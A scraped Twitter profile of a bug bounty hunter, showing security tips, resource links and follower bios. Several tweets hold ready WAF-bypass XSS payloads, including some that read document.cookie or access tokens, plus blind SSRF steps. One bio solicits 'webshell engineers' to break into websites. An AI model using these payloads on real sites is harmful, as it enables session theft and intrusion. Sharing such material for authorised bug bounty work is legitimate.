-
Tweets110
-
Followers263
-
Following623
-
Likes381
Can Bug Bounty Cause Serious Mental Stress, Extreme Frustration Or Learned Helplessness ? #bugbounty #hacking #bugbountytips Curious To Know!
A good way to bypass the Akamai WAF by exploiting a redirect-based XSS is with the following payload: javascript:new%20Function`al\ert\`1\``; You can also obfuscate it using HTML entities #BugBounty
I miss the good old hacking days when it was not just about finding bugs, Around 2011, when hacking wasn't any race. These days i see beginners say, "I want to learn bug hunting", no one says "I want to learn hacking", Days when hacking was not about earning but about learning.
Hunting for Vulnerabilities in Android Apps with Burp and APK Tools. labs.p64cyber.com/hunting-for-vu…
[Deserialization Attack Resources] Introductory Video: youtube.com/watch?v=EzOquQ… Paper: exploit-db.com/docs/english/4… Write-ups: hackerone.com/reports/134321 hackerone.com/reports/350418 artsploit.blogspot.com/2016/01/paypal… Cheatsheet: github.com/swisskyrepo/Pa…
FTP Penetration Testing on Ubuntu (Port 21) hackingarticles.in/ftp-penetratio… SSH Penetration Testing (Port 22) hackingarticles.in/ssh-penetratio… Penetration Testing on Telnet (Port 23) hackingarticles.in/penetration-te… NetBIOS and SMB Penetration Testing on Windows hackingarticles.in/netbios-and-sm…
I'm proud to share my first write-up, hope you enjoy it Think Outside the Scope: Advanced CORS Exploitation Techniques link.medium.com/UTKkk4wvGW
“Web Services & API Pentesting-Part 1” by Asfiya Shaikh link.medium.com/a/key_live_ofx…
“BLIND SSRF in *.stripe.com due to Sentry Misconfiguration” by Oktavandi link.medium.com/DFF748gyyW
Sentry Blind SSRF (hackerone.com/reports/374737 /medium.com/@0ktavandi/bli…) 1. cat aquatone/*/urls.txt | grep sentry 2. Burpsuite 3. Send it to Repeater 4. Change the value of filename: to a postb.in url (or similar) 5. Wait for a connection 6. 👻
Akamai WAF bypass XSS in HTML-context when no character-filtering exists to trick it: <style>@KeyframeS a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}`>
It's my honor to present at #BHUSA again! @mehqq_ and I will show our research and disclose pre-auth RCEs on at least 3 leading SSL VPN vendors! blackhat.com/us-19/briefing… @BlackHatEvents
XXE triggered by a UDP response packet; that's slick. The write-up is great as well with vulnerable Docker and really nice PoC. talosintelligence.com/vulnerability_…
#bugbounty tip: to demonstrate XSS impact, don't use alert('alert'). Determine whether session is stored in cookies or local storage and put that in the popup. cookie: alert(document.cookie) LocalStorage: alert(localStorage.getItem('access_token')) #securetheinternet
Common ways to get RCE: - SSRF to Metadata - Jenkins /script - Jenkins Orange RCE - Leaked cloud creds/keys (online, via LFD, ect) - Arbitrary file upload - ImageTragik - SSTI Fill in how you've gotten RCE!
#tutorial Universal Android #SSLPinning In 10 Minutes With Frida (@fridadotre) I didn’t found a pretty clear tutorial for beginners in mobile security like me, so that’s why decided to create this 10 min tutorial. omespino.com/tutorial-unive… #BugBounty #infosec #AndroidSecurity
Cloudflare Bypass: <a href="j	a	v	asc
ri	pt:\u0061\u006C\u0065\u0072\u0074(this['document']['cookie'])">X</a>
Happy October, SRT! For our #SRToftheMonth, we are excited to introduce not just one, but three. Congrats @nahmedfaisal, @tareksiddiki & @meshahriyar!! These 3 made some $$ hacking for Synack during their vacation in Bangladesh last year. #placesyougowithSRT
If you are testing graphql try entering some random queries e.g: `mutation addAdmin` and graphql might ask if you meant createAdmin
Just released a new exploit for CVE-2018-15473 OpenSSH Username Enumeration! You can find it here: github.com/Rhynorater/CVE…
MorningStar @0xMstar
19K Followers 1K Following security researcher , bug bounty hunter ,bugcrowd top 10, co-founder https://t.co/1bT321Ayen, https://t.co/WqLPzN7PyL
Brooke Milton @BrookeMilt92327
1 Followers 170 Following Recruiting webshell engineers to penetrate websites, with a monthly salary of up to $100,000. If interested, please contact https://t.co/xlEY53tx9Y
Shuvo Kumar Saha 🇧... @syper_shuvo
572 Followers 867 Following Bug Bounty Hunter | Penetration Tester
Mostafa Gamal @Moostafa_Elsawy
39 Followers 536 Following لا يستطاع العلم براحة الجسد 👨🏻💻⚔️ . Free Palestine🇵🇸
Md Sadat Tamzit @SadatTamzit
1K Followers 703 Following “Passionate about cybersecurity, I uncover vulnerabilities to build a safer digital world.”
LeBron @LeBroncash
234 Followers 3K Following I am a nurse | cyber security researcher | bug bounty hunter | ethical hacker
Carla @Thanat27942
105 Followers 2K Following Ensine a maneira mais simples de ganhar dinheiro. O horário e o local de trabalho são decididos por você, fáceis de dominar.
Hasan Khan @Hasan_Khan0X
1K Followers 2K Following Software & Web Application Penetration Security Testing Engineer | Bug Bounty Hunter | White Hat Hacker | Cyber Security Expert
thetowsif 👾 @thet0wsif
58 Followers 781 Following Application Security @Hacker0x01 | Developer | Problem Solver | Drummer | Building Technology For Business 🚀
Md Ismail Šojal �... @0x0SojalSec
31K Followers 5K Following Cyber_Security_Re-searcher || 0SINT || Malware Analysis II Pwn || Ai Re-searcher || Project @AIStrikeSec || 0ld Accounts Suspended @0xSojalSec ||
Nasim Mostakim (TomCa... @Ontu404
397 Followers 282 Following |CTF Player| |Bug Bounty Hunter| |Hacker|
Tahsin Akbar Ohi @akbar_ohi
655 Followers 332 Following 20 Years old | Driven Penetration Tester • Bug Bounty Hunter • Threat Hunter • Incident Response Specialist • Solidity Auditor || eJPTv2 || CASA || GCP
Martin Laak @martinlaak
71 Followers 137 Following
Nisarg Shah.. @NisargS00074306
3 Followers 306 Following I am Nisarg shah.. Bca Student ( bachelor of computer application) From.. Lunavada. District. mahisager. Gujrat.. MOBAIL Number.8200135839
Alex khan @FedeMadoery
275 Followers 2K Following
Jubayer Ahmed Rhyme @Jub4y3r_3x009
240 Followers 3K Following مهاجم آسيوي عشاق الأمن السيبراني | _-_ | المتعلم | باغ باونتي هنتر Web Application Security Researchers At Hackerone & Bugcrowd
Kenneth @KenGeo_
778 Followers 3K Following Offensive Cybersecurity Engineer 🏴☠️ Research, exploit and play | 👻 CRTP, eCPPT, eWPTX, eWPT, eMAPT, eJPT, CEH Master
Ahmed Talha @TOxin_J4CK
100 Followers 1K Following Cyber Security Enthusiast |_-_| Learner | Bug Bounty Hunter � Web application Attacker & Penetration Tester �
lucky rom @luckyrom3
56 Followers 2K Following
Baymax @BaymaxPop23
30 Followers 266 Following Security Engineer @Amazon | Application-Security | AWS Security | Python Lover | Part-Time Bug Hunter |
Ariyan @SidAriyan
9 Followers 2K Following
Keshav Malik @g0t_rOoT_
599 Followers 482 Following Security at @LinkedIn | Security Automation | Content Writer
Gawasharks @gawasharks
197 Followers 2K Following
Videha!! @OxMvideha
27 Followers 242 Following Arise, Awake, and Stop Not Till The Goal Is Reached !! Java | C++ Developer 🤟🏼
Eduardo Nuri @eduardo_nuri
6K Followers 3K Following Father, Real Estate, SaaS founder of @octatech_io and sometimes Bug Bounty Hunter/Security Researcher.
Hinal Mangukiya @MangukiyaHinal
3 Followers 391 Following
GFX🇧🇩Ovi @mdovi303
384 Followers 3K Following An independent cyber security researcher.🖥 ~SRT Member 🐞~ ✌Hall Of Fame by: Google,Uber,Payoneer,Hotjar,walmart,T- Mobile,Wetransfer and many more... 🙂
Prakash c @prakash_C_k
207 Followers 3K Following வறுமை ஒரு வரப்பிரசாதம். Developer || Learner || Smile
Shardul Borkar @ShardulBorkar1
68 Followers 865 Following Assistant Manager - Cyber Security @Deloitte India || Ex- @PwC India || Ex-@niiconsulting || Bug Bounty Hunter || Cyber Security Enthusiast #Learner
Jarvis @jarvis706
16 Followers 219 Following Jarvis⭕ I don't care what people think of me , this is me in the rawest form learner 🐕
S.ih @007_isnuoT
2K Followers 2K Following ┳┻|𝔑𝔢𝔳𝔢𝔯 𝔗𝔯𝔲𝔰𝔱 𝔗𝔬 𝔞 𝔘𝔰𝔢𝔯 ┻┳|𝔑𝔢𝔳𝔢𝔯 𝔗𝔯𝔲𝔰𝔱 𝔗𝔬 𝔞 𝔘𝔰𝔢𝔯 ┳┻| ┻┳| ┳┻| ┻┳| ┳┻| _ ┻┳| •.•) Exiting vim isn’t that ┳┻|⊂ノ hard ┻┳|
helloworld/ @hellodebug8
255 Followers 6K Following
Diogo Duran @dmpduran
5 Followers 329 Following
Intigriti @intigriti
193K Followers 658 Following Bug bounty & VDP platform trusted by the world’s largest organisations! 🌍
Sam Curry @samwcyo
97K Followers 1K Following Hacker, bug bounty hunter. Run a blog to better explain web application security.
Julien | MrTuxracer �... @MrTuxracer
37K Followers 443 Following Freelancer | #BugBounty | @Hacker0x01 H1-Elite | $1,500,000 Overall Bounties | ❤️ Reversing | Mobile Hacker | https://t.co/pcWduPOt0n
Ben Sadeghipour @NahamSec
233K Followers 1K Following Cofounder @hackinghub_io | Advisor @CaidoIO. I hack companies and make content about it. #NahamCon organizer. ex @hacker0x01🇮🇷
Yassine Aboukir 🐐 @Yassineaboukir
31K Followers 372 Following HackerOne Top 50, Elite, Pentest Lead, Ambassador, MVH Title and (former) Hacker Advisory Board • Digital Nomad • (Un)pro Athlete
publiclyDisclosed @disclosedh1
65K Followers 2 Following This is an unofficial HackerOne public disclosure watcher who keeps you up to date about the recently disclosed bugs. By @NOBBD
Nathaniel @nnwakelam
41K Followers 919 Following
MorningStar @0xMstar
19K Followers 1K Following security researcher , bug bounty hunter ,bugcrowd top 10, co-founder https://t.co/1bT321Ayen, https://t.co/WqLPzN7PyL
Aditya Shende @ADITYASHENDE17
60K Followers 420 Following MS Cyber 🇬🇧 | Work @BforeAI | @Bugcrowd Top 100 | Bug Bounty Trainer | Keynote Speaker | Professional Biker | @kong_sec 🇮🇳 | Own Views ≠ Employment
Inti De Ceukelaire @securinti
29K Followers 372 Following Hacker | @intidc (Dutch) | Chief Hacker Officer @intigriti
Harsh Bothra @harshbothra_
43K Followers 741 Following Freelance Pentester & Consultant • Cobalt Core Lead & Pentester • Author • Speaker • Blogger • SecurityExplained • Project Bheem • Learn365 • Views are personal
Hussein Daher @HusseiN98D
49K Followers 197 Following Entrepreneur, Hacker 🇱🇧🇨🇮 @WebImmunify 21th/270000 BugCrowd Hacking Platform
JS0N Haddix @Jhaddix
167K Followers 7K Following CEO, CISO, Trainer, Hacker, and Speaker. Cybersecurity + Hacking + AI + Sec Leadership @arcanuminfosec
bugcrowd @Bugcrowd
187K Followers 6K Following The leading provider of crowdsourced cybersecurity solutions purpose-built to secure the digitally connected world...Unleash Ingenuity™
Web Security Academy @WebSecAcademy
130K Followers 36 Following Free web security training from @PortSwigger
Jobert Abma @jobertabma
43K Followers 718 Following I tweet about security and my experience as a hacker. Co-founder of HackerOne (@Hacker0x01).
Masonhck357 @Masonhck3571
16K Followers 781 Following 🔍 Top 100 Bug Bounty Hunter @ Bugcrowd | 🇩🇴 Dominican | Ethical hacking fanatic | 🎮🎵 Lover | Keeping the digital world safe. opinions are that of my own
Tib3rius @0xTib3rius
68K Followers 586 Following High Queen of the Cybers | Educator | Content Creator | UwU-Anointed Wapp King | Ex-Brit | https://t.co/04RRExvxXj (he/him) 🇺🇸 I run gameshows at DEF CON.
Md Sadat Tamzit @SadatTamzit
1K Followers 703 Following “Passionate about cybersecurity, I uncover vulnerabilities to build a safer digital world.”
Bipin Jitiya @win3zz
8K Followers 141 Following Founder of @Cuberks. Maker, hacker, security researcher. Love nature and psithurism. Tweets mostly about hacking, tech, entrepreneurship, and other geeky stuff.
kassem @kassem_S94
3K Followers 196 Following Ethical Hacker | Web app pentester | Hacker @Hacker0x01 and Bugcrowd/intigriti | Whitehat @Immunefi | HOF APPLE/MICROSOFT |Follow me https://t.co/Otm27phCov
💫 @umr4n6
3K Followers 523 Following SecOps Manager @bugcrowd • @GeorgiaTech & @asu alumna • Digital Artist • Cat Mom • It looks like you have installed ad blocker ✨
jay @JakeCorina
241 Followers 683 Following
Godfather Orwa 🇯�... @GodfatherOrwa
24K Followers 2K Following Hacker | Bug Hunter | Cooker | Top 5 P1 Warrior On https://t.co/dzFQH75OWj | LevelUpX Champion | 10+ 0Days/CVEs
sw33tLie @sw33tLie
10K Followers 910 Following Web application hacker, 25yo. Top 30 @ https://t.co/wX0yr85Tzk https://t.co/ZI7a8oJJcQ https://t.co/LGYK7tMOGo
HAHWUL @hahwul
11K Followers 257 Following 🔥 Offensive Security Engineer, Developer and H4cker. Feel free to call me HAH-hul or HOWL—whichever you prefer!
D @act1on3
161 Followers 157 Following
Linus Henze @LinusHenze
26K Followers 22 Following macOS and iOS Fan. CTF with @allesctf and @Sauercl0ud. Founder @pinauten. they/them
Chalie @pwnipc
2K Followers 1K Following Offensive Android Security Researcher, ARM assembly addict, Exploit Dev? and a part time CTF player @fr334aks.
Josip Franjković @JosipFranjkovic
6K Followers 963 Following I am an average Joe who enjoys breaking websites. My security blog: https://t.co/dtvxa0rjfw
Showwcase @ShowwcaseHQ
53K Followers 176 Following Connecting companies with on-demand developers and teams. Where developers Grow 📚 // Collaborate 📈 // Get hired 💰
Sergey Toshin @_bagipro
7K Followers 186 Following Ranked as the #1 security researcher for Google Play Security Rewards Program. The founder of @OversecuredInc Android and iOS vulnerability scanners
Sheeraz Ali @beingsheerazali
1K Followers 774 Following Content Engineer @hackthebox_eu aka Pwnmeow #OSCP | lead @nullbhopal | Organiser @seasides_conf | Contributor @codevigilant | Personal Twitter| 20+CVEs #infosec
Peter M @pmnh_
3K Followers 567 Following aka pmnh / ex-Security researcher / Synack #1 SRT 2022-2023 / Synack, HackerOne, BC / Deep recon / source code analysis. Opinions my own, not employer.
enter - NFT ecosystem... @EnterNFT
89K Followers 101 Following 🔺 https://t.co/RgtGE8HmSW 🔺 Building in web3 since Q1 2021 | $NFTART Visual NFTs on https://t.co/MjpkGABz4H & Music NFTs on https://t.co/fXaarbP54f 🖌 🎶
Ahmed @ahm3dsec
2K Followers 719 Following
Aseem Shrey @AseemShrey
8K Followers 3K Following Founder https://t.co/gzIQqhCPZb - We handle security. You ship awesome products 🚀 🛠️ Founder SecureMyOrg 📹 https://t.co/ZjN2YzePJW #cybersec #privacy
Mrityunjoy Biswas @mitunjoy11
4K Followers 573 Following Application Security Professional | Cobalt Core Lead & Pentester @cobalt_io | BugBounty Hunter @Hacker0x01 | Red Team Member (SRT) at @SynackRedTeam
PortSwigger Research @PortSwiggerRes
111K Followers 7 Following Web security research from the team at @PortSwigger
Haroon Hameed 🇵�... @HaroonHameed40
645 Followers 92 Following Cyber Security Enthusiast | Pentester | @YesWeHack Hunter
Oops! @Corrupted_brain
1K Followers 513 Following Information security | VAPT | OWASP Kathmandu Chapter Leader
CVE.report @CVEreport
2K Followers 7 Following https://t.co/g798XHB0Ba #0day #Exploit #Vulnerability #Exploits #Vulnerabilities #ZeroDay Tracking the latest CVE Vulnerabilities
seaman @seaman00o
918 Followers 1K Following Offensive Security Engineer | #OSCP | #CREST #CRT |#CPSA | #CRTE | #CRTO | #eCPTXv2 | #eWPTXv2 | #eCPPTv2
Mahmoud Hamed @7odamoo
4K Followers 679 Following
InfoSec Community @InfoSecComm
52K Followers 636 Following Largest InfoSec publication with 62,000+ followers and 1M+ monthly views.
endoftime @endodtime_
177 Followers 314 Following The prosperity of this world doesn't belong to me.
Rana Khalil 🇵🇸 @rana__khalil
56K Followers 844 Following AppSec Team Lead | OSCP | CEO & Instructor of @ranakhalilacad
Nagli @galnagli
39K Followers 482 Following Hacker; Head of Threat Exposure at @wiz_io 🧙♂️; Bug Bounty Hunter; Live Hacking Events Winner
SANTOSH KUMAR SHA @killmongar1996
674 Followers 224 Following Its good to break any thing so that u can learn. Because breaking also need some kind of skilledTrends for United States
You might like
